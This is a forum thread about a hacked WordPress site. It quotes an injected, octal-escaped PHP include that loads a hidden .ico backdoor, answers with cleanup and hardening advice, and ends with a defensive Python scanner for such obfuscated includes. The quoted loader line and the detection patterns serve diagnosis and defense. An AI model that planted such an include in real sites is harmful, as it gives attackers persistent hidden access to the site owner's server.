
It looks like my WordPress site has been hacked. The following code snippet was in index.php and wp-config.php:

<?php
/*6b9bb*/

@include "57ho155e/151nt145r7602/160ub154ic137ht155l/167p-151nc154ud145s/152s/164in171mc145/.146b463d6700.151co";

/*6b9bb*/

I have changed:

  1. WP Admin URL, and put a strong password and username
  2. Changed the cPanel/FTP password to a strong one
  3. Implemented iThemes Security
  4. Updated WordPress to the latest version (themes and plugins too)

However, the code appeared again. What would be a good solution?

P.S. I am using SiteGround.

Thanks

3 Answers


  1. Yeah, someone is including a .ico file (open it with a text editor, and you will see it is some PHP code and no real ico file):

    /home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

    Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this.
    At the moment closing the initial front-door they use is your sole occupation.

    Follow the advice in this article:
    https://codex.wordpress.org/FAQ_My_site_was_hacked
    And then: https://codex.wordpress.org/Hardening_WordPress

    Here are some links about backdoors:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

  2. Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:

    • Back up the whole installation (just in case)
    • Download the complete wp-content/uploads folder
    • Make a screenshot or save the page with the currently active plugins
    • Delete ALL files
    • Get a fresh WordPress setup and extract it
    • Download a fresh copy of your theme and child theme (recreate the previous setup)
    • Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB
    • Examine the saved uploads folder for files that shouldn't be there, like PHP files, then upload it to the new folder
    • Reinstall all plugins, fresh downloads
  3. I faced this problem too, and step by step I did the steps below:

    • Cleaning the injected code manually
    • Changing all the passwords
    • Hiding the WP admin dashboard URL
    • Limiting the login attempts
    • Installing security plugins (Sucuri, Wordfence Security)
    • Contracting with a Sucuri plan

    The good thing is to install the Wordfence Security plugin and run the scan; then you will detect all the files with the injected code and you can clean the injected code manually.
    You can also visit this link:
    https://naderzad.info/web-development/wordpress-code-injection/
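A read-only scanner for the indicators the answers above describe: PHP code inside a non-PHP file such as the .ico, PHP files under uploads, and include statements whose path is written with string escapes. This is an added example, not code from the thread; it assumes the injected path uses PHP octal/hex escapes in a double-quoted string, and every file name and path in `demo()` is constructed.

```python
import pathlib
import re
import tempfile

PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".phar"}
INCLUDE_RE = re.compile(rb'(?:include|require)(?:_once)?\s*\(?\s*"([^"]+)"')
ESCAPE_RE = re.compile(rb'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))')

def decode_escapes(raw: bytes) -> str:
    """Decode \\NNN octal and \\xHH hex escapes as PHP does in double quotes."""
    def repl(m):
        return bytes([int(m[1], 16) if m[1] else int(m[2], 8) & 0xFF])
    return ESCAPE_RE.sub(repl, raw).decode("latin-1")

def scan_tree(root: str):
    """Return sorted (relative_path, reason) findings for a WordPress tree."""
    findings = []
    for path in pathlib.Path(root).rglob("*"):  # rglob also yields dotfiles
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        is_php = path.suffix.lower() in PHP_EXT
        if not is_php and b"<?php" in data:
            findings.append((rel, "PHP code in non-PHP file"))
        if is_php and "/uploads/" in "/" + rel:
            findings.append((rel, "PHP file under uploads"))
        for m in INCLUDE_RE.finditer(data if is_php else b""):
            if ESCAPE_RE.search(m[1]):  # an escaped path hides the real target
                findings.append((rel, "obfuscated include -> " + decode_escapes(m[1])))
    return sorted(findings)

def demo():
    """Scan a small constructed tree (sample data, not taken from the thread)."""
    samples = {
        "index.php": rb'<?php @include "\57srv/wp-\151ncludes/.\145xample.\x69co";',
        "wp-includes/version.php": b'<?php include "load.php";',
        "wp-includes/.example.ico": b"<?php /* constructed stand-in */",
        "wp-content/uploads/2020/x.php": b"<?php /* constructed */",
        "wp-content/uploads/2020/logo.png": b"\x89PNG\r\n\x1a\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            dest = pathlib.Path(root, rel)
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server; it only reads files and reports candidates for manual review.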